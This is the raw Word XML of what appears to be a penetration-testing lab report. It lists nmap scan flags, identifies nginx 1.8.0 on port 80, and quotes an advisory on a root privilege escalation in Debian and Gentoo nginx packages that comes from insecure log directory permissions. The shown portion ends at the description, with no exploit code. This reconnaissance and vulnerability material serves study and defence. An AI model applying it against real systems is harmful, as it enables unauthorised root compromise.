    <w:p w14:paraId="6C70C042" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00D67F91">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–v – version detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8C95F1" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00D67F91">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-A: Enable OS detection, version detection, script scanning, and traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78612307" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00D67F91">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–sv -</w:t>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Probe open ports to determine service/version info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189B3A3" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00D67F91">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–p – determining the ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD43DD" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00D67F91">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E15259" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00D67F91">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4420EABC" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DDA164C" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72963FF1" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091FF4B1" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FAF2C2" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3FC8C2" w14:textId="77777777" w:rsidR="00D67F91" w:rsidRPr="002B24A4" w:rsidRDefault="00D67F91" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79056A81" w14:textId="77777777" w:rsidR="005C7CA3" w:rsidRPr="002B24A4" w:rsidRDefault="005C7CA3" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CHECKING FOR PORT NO.80 SERVICE-HTTP AND VERSION – nginx 1.8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD3C143" w14:textId="77777777" w:rsidR="005C7CA3" w:rsidRPr="002B24A4" w:rsidRDefault="005C7CA3" w:rsidP="005C7CA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A9FE7B" w14:textId="77777777" w:rsidR="004647AC" w:rsidRPr="002B24A4" w:rsidRDefault="006118D8" w:rsidP="005C7CA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59A660BC" wp14:editId="5ED9E95B">
            <wp:extent cx="5762625" cy="33808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1241" cy="3415266"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69949809" w14:textId="77777777" w:rsidR="006118D8" w:rsidRPr="002B24A4" w:rsidRDefault="006118D8" w:rsidP="005C7CA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04998BEE" w14:textId="77777777" w:rsidR="006118D8" w:rsidRPr="002B24A4" w:rsidRDefault="006118D8" w:rsidP="005C7CA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1199EA34" w14:textId="77777777" w:rsidR="00A627C8" w:rsidRPr="002B24A4" w:rsidRDefault="00A627C8" w:rsidP="00254A81">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
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BA7DF8" w14:textId="77777777" w:rsidR="00A627C8" w:rsidRPr="002B24A4" w:rsidRDefault="00A627C8" w:rsidP="00254A81">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
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057F6BF6" w14:textId="77777777" w:rsidR="00A627C8" w:rsidRPr="002B24A4" w:rsidRDefault="00A627C8" w:rsidP="00254A81">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
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045D802E" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">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
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ABOUT NGINX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B26F3" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00CD7DD6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E201A2"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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09657707"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I. VULNERABILITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493EC7C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E41995" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB61604"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Nginx (Debian-based + Gentoo distros) - Root Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A77435C" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C600B32"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 xml:space="preserve">Fixed in 1.6.2-5+deb8u3 package on Debian, and </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9A50DD"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1.10.0-0ubuntu0.16.04.3 on Ubuntu 16.04 LTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1CDDA5" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106FAEA1"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Gentoo is also affected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278B05FF"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nginx &lt; 1.10.2-r3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B71C142" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760FCE99" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5775CAAD" w14:textId="77777777" w:rsidR="002B24A4" w:rsidRDefault="002B24A4" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CED3BDE" w14:textId="77777777" w:rsidR="002B24A4" w:rsidRDefault="002B24A4" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141E9881"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II. BACKGROUND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CD5311"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F8BAF3" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7828B4D8"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 xml:space="preserve">"nginx [engine x] is an HTTP and reverse proxy server, a mail proxy server, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAEC7FE"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 xml:space="preserve">and a generic TCP/UDP proxy server, originally written by Igor Sysoev. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B291F"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 xml:space="preserve">For a long time, it has been running on many heavily loaded Russian sites </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A57FE6"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 xml:space="preserve">including Yandex, Mail.Ru, VK, and Rambler. According to Netcraft, nginx </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28287B24"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 xml:space="preserve">served or proxied 27.80% busiest sites in October 2016. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408CCBA"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Here are some of the success stories: Netflix, Wordpress.com, FastMail.FM."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2BB55" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF99BD3" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00254A81" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://nginx.org/en/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BDBAF5D" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E36816" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="301D0403"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III. INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642FAFD8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1479D99F" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219E6EAC"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Nginx web server packaging on Debian-based distributions such as Debian or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56088204"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Ubuntu was found to create log directories with insecure permissions which</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70C2E0"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can be exploited by malicious local attackers to escalate their privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F0C2AC"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from nginx/web user (www-data) to root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06691C46" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096E7077"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 xml:space="preserve">The vulnerability could be easily exploited by attackers who have managed to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDD4032"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 xml:space="preserve">compromise a web application hosted on Nginx server and gained access to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF4BC7D"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 xml:space="preserve">www-data account as it would allow them to escalate their privileges further </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF01135"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to root access and fully compromise the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD0D33A" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F444204"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Update 11.01.2017:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A58D83"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lastRenderedPageBreak/>
        <w:t>Gentoo and its nginx packages were also found affected by this vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6232B04E" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00254A81" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://security.gentoo.org/glsa/201701-22</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DA298BF" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71CAAD40" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0765769A"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IV. DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A839948"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C46DC" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57572862"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 xml:space="preserve">Nginx installed from default repositories on Debian-based systems (Debian, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B515DD"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Ubuntu etc.) create nginx log directory at the following location and with the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F148618"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following permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61691325" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171056C6"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root@xenial:~# ls -ld /var/log/nginx/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DDA5B8"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drwxr-x--- 2 www-data adm 4096 Nov 12 22:32 /var/log/nginx/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B821A"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root@xenial:~# ls -ld /var/log/nginx/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122AD566"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rw-r----- 1 www-data adm         0 Nov 12 22:31 /var/log/nginx/access.log</w:t>
